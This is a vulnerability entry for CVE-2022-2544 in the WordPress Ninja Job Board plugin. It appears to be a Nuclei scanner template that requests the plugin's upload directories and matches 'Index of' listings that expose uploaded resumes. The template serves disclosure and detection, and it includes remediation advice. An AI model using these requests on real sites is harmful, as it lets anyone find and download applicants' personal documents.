WordPress Ninja Job Board plugin prior to 1.3.3 is susceptible to a direct request vulnerability. The plugin does not protect the directory where it stores uploaded resumes, making it vulnerable to unauthenticated directory listing which allows the download of uploaded resumes.
PoC
id: CVE-2022-2544
info:
name: WordPress Ninja Job Board < 1.3.3 - Direct Request
author: tess
severity: high
description: WordPress Ninja Job Board plugin prior to 1.3.3 is susceptible to a direct request vulnerability. The plugin does not protect the directory where it stores uploaded resumes, making it vulnerable to unauthenticated directory listing which allows the download of uploaded resumes.
impact: |
An attacker can access sensitive files and potentially obtain sensitive information from the target system.
remediation: |
Update to the latest version of the WordPress Ninja Job Board plugin (1.3.3) to fix the vulnerability.
reference:
- https://plugins.trac.wordpress.org/changeset/2758420/ninja-job-board/trunk/includes/Classes/File/FileHandler.php?old=2126467&old_path=ninja-job-board%2Ftrunk%2Fincludes%2FClasses%2FFile%2FFileHandler.php
- https://wpscan.com/vulnerability/a9bcc68c-eeda-4647-8463-e7e136733053
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2544
- https://nvd.nist.gov/vuln/detail/CVE-2022-2544
- https://github.com/ARPSyndicate/cvemon
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-2544
cwe-id: CWE-425
epss-score: 0.04267
epss-percentile: 0.90578
cpe: cpe:2.3:a:wpmanageninja:ninja_job_board:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: wpmanageninja
product: ninja_job_board
framework: wordpress
tags: cve2022,cve,ninja,exposure,wpscan,wordpress,wp-plugin,wp,wpmanageninja,vuln
http:
- method: GET
path:
- "{{BaseURL}}/wp/wp-content/uploads/wpjobboard/"
- "{{BaseURL}}/wp-content/uploads/wpjobboard/"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Index of /wp/wp-content/uploads/wpjobboard"
- "Index of /wp-content/uploads/wpjobboard"
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# digest: 490a004630440220645a5c2383e8d41fbc8954f692fb036f5d08615c60ce5eaa54eecb30a37eff7202200ee2a78ba3c469a9c57b2b0d3cafe291dbeed48dd55fa2379e13d49f813e37eb:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.